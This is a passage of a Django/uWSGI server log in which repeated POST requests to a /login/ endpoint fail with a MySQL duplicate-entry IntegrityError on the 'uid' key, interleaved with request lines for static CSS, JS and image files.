read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 766/1004] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:33 2021] POST /login/ => generated 208507 bytes in 132 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 767/1005] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:35 2021] POST /login/ => generated 208507 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 768/1006] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:36 2021] POST /login/ => generated 82 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 165 bytes (2 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 769/1007] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:36 2021] POST /login/ => generated 208507 bytes in 136 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 770/1008] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:44 2021] POST /login/ => generated 208507 bytes in 136 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 771/1009] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:37:10 2021] GET /login/ => generated 6428 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1010] 219.228.146.156 () {40 vars in 865 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1011] 219.228.146.156 () {40 vars in 887 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1012] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1013] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1014] 219.228.146.156 () {40 vars in 873 bytes} [Thu Jan 14 08:37:10 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1015] 219.228.146.156 () {40 vars in 848 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1016] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1017] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1018] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1019] 219.228.146.156 () {40 vars in 854 bytes} [Thu Jan 14 08:37:10 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1020] 219.228.146.156 () {40 vars in 908 bytes} [Thu Jan 14 08:37:10 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 772/1021] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:17 2021] POST /login/ => generated 208453 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 